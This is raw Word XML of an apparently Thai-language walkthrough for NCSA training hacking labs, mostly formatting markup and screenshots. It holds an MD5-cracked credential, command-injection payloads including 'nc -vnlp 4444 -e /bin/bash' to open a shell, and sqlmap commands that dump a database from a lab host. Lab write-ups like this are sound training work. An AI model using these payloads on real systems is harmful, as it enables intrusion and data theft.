    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4AF0D0DD" w14:textId="38477930">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="4079D276" wp14:anchorId="194FBD56">
            <wp:extent cx="5972175" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="845055074" name="drawing" title="A computer screen shot of a program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055074" name="Picture 845055074"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1422696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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="0C59DB42" w14:textId="24619B13">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="4596E4E6" wp14:anchorId="6DC6632A">
            <wp:extent cx="5962650" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="326852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852632" name="Picture 326852632"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1393690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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1282D1B7" w14:textId="051C12CD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**** </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>กด</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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:q </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">ออกมา (เป็นเหมือน </w:t>
      </w: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>vi)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4D31F5AB" w14:textId="7E89F97D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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="739A5982" w14:textId="0B5048C2">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="16A00FD0" wp14:anchorId="0D02A457">
            <wp:extent cx="5962650" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="69656383" name="drawing" title="A screen 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656383" name="Picture 69656383"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1651200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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="26065541" w14:textId="331E2056">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">เอาไป </w:t>
      </w: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crack </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">ด้วยเครื่องมือ </w:t>
      </w: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crack md5 </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">ได้ข้อมูลกลับมาเป็น </w:t>
      </w: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>user:noob pass:password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1897C615" w14:textId="1482887E">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">เมื่อใช้คำสั่ง  </w:t>
      </w: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\l </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">ได้ข้อมูล </w:t>
      </w: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>database</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> คือ </w:t>
      </w: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>challenge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="78EC180E" w14:textId="7D2F49A2">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">ออกไป </w:t>
      </w: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login </w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>ใหม่</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="70AB672F" w14:textId="294FBC4D">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="508172E0" wp14:anchorId="4C1EE9CB">
            <wp:extent cx="3867150" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="357581033" name="drawing" title="A computer screen shot of a computer code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581033" name="Picture 357581033"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId46976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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1C9CFAF4" w14:textId="17380973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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="33CF8764" w14:textId="722962FA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R89627b10854f4ee3">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/95</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7D383DC8" w14:textId="6040EB32">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="76F7A65C" wp14:anchorId="6A4BF49D">
            <wp:extent cx="3305175" cy="3781425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="741842639" name="drawing" title="A screenshot of a computer screen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1842639" name="Picture 741842639"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1683666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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="67463EDA" w14:textId="411FAE26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EEE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="7F664025" w14:textId="7E00E293">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rebe07d79826043f1">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="7EEE116F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https://play.mooc.ncsa.or.th/lab/96</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EEE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="2AABECA3" w14:textId="5A2A268D">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="7EEE11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EEE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="3A39F739" w14:textId="75664F46">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="7EEE116F">
        <w:drawing>
          <wp:inline wp14:editId="72B092D4" wp14:anchorId="3A1BF9BC">
            <wp:extent cx="3381375" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1909544770" name="drawing" title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9544770" name="Picture 1909544770"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1741813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EE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="1F7B2B6F" w14:textId="17E5D7DB">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="7EEE116F">
        <w:drawing>
          <wp:inline wp14:editId="307441A5" wp14:anchorId="011FB178">
            <wp:extent cx="3381375" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1956846697" name="drawing" title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846697" name="Picture 1956846697"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1792642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EE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="4E264C3D" w14:textId="0169AB6B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="7EEE116F">
        <w:drawing>
          <wp:inline wp14:editId="17CA58E0" wp14:anchorId="65173AAC">
            <wp:extent cx="3467100" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1554412275" name="drawing" title="A computer screen shot of white text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412275" name="Picture 1554412275"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId459807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EE116F" w:rsidP="5F2E2CBF" w:rsidRDefault="7EEE116F" w14:paraId="6CE753CB" w14:textId="16136D6B">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="7EEE116F">
        <w:drawing>
          <wp:inline wp14:editId="2ED594C6" wp14:anchorId="0446907A">
            <wp:extent cx="5962650" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1695221766" name="drawing" title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5221766" name="Picture 1695221766"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId423126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2E2CBF" w:rsidP="5F2E2CBF" w:rsidRDefault="5F2E2CBF" w14:paraId="2BB162B9" w14:textId="350A3683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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7E08E93B" w14:textId="4B115D0C">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="R04d1725a7fba4c8d">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/97</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4FBC8272" w14:textId="68603E27">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="1580A092" wp14:anchorId="331BCE84">
            <wp:extent cx="2200275" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="505023284" name="drawing" title="A computer screen with white text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5023284" name="Picture 505023284"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId754292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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4D92BA2E" w14:textId="5D79ACD3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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7A27FEFA" w14:textId="63E20C50">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rdeef21efc2ac49ef">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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https://play.mooc.ncsa.or.th/lab/98</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="7F7E9DCD" w14:textId="19693A52">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
          <wp:inline wp14:editId="2C3FDA17" wp14:anchorId="0D7F6F3F">
            <wp:extent cx="3924300" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1739265707" name="drawing" title="A computer screen shot of a program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265707" name="Picture 1739265707"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2617970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7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="2E039774" w14:textId="15061837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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="48EDED56" w14:textId="3B4EEFC9">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rb060cf7e7dd043f1">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://play.mooc.ncsa.or.th/lab/</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="467886"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>133</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3A97FCFE" w14:textId="54F8F594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de-DE"/>
        </w:rPr>
        <w:t>127.0.0.1 &amp; whomai</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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127.0.0.1 &amp; nc -vnlp 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="04A950CE" w14:textId="0D655B4D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>Or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4ABFB398" w14:textId="7EA129B0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>127.0.0.1 &amp; ls /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1631E42D" w14:textId="78A0C484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>127.0.0.1 &amp; cat flag_YmIzM.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="1DE5441E" w14:textId="35086757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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="51590E21" w14:textId="7F69B90C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bdb3d4b1dfa416f">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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https://play.mooc.ncsa.or.th/lab/139</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3FB3C949" w14:textId="1BA540A7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sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="R4e3a5ada997c4b13">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>34.87.33.35/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w: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>data="bookID=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve">1" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="5C45A848" w14:textId="75241365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sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="Re71c90dd5b174709">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>34.87.33.35/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w: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>data="bookID=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>1" --</w:t>
      </w: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>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="714D213D" w14:textId="721A3F84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sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="R440e66bda2944dd9">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>34.87.33.35/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w: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>data="bookID=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>1" -</w:t>
      </w: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>D book --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="0D74C127" w14:textId="0B38CFD9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sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="Rba92c8c5f8a64a4d">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C8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</w:t>
        </w:r>
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="th"/>
          </w:rPr>
          <w:t>34.87.33.35/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w: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>data="bookID=</w:t>
      </w:r>
      <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88">
        <w:rPr>
          <w:rFonts w:ascii="Cordia New" w:hAnsi="Cordia New" w:eastAsia="Cordia New" w:cs="Cordia New"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="th"/>
        </w:rPr>
        <w:t>1" -</w:t>
      </w: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>D book -T flag –dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="6A596368" w14:textId="7E07199F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>sqlmap -r inject.txt --batch --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="60F8C95A" w14:textId="6498E0FD">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr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AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="3DF38136" w14:textId="198DBE26">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="Rc4c7c6dc65164552">
        <w:r w:rsidRPr="5F2E2CBF" w:rsidR="3AED7C88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https://play.mooc.ncsa.or.th/lab/144</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AED7C88" w:rsidP="5F2E2CBF" w:rsidRDefault="3AED7C88" w14:paraId="4E2A459C" w14:textId="4F2AD7D0">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidR="3AED7C88">
        <w:drawing>
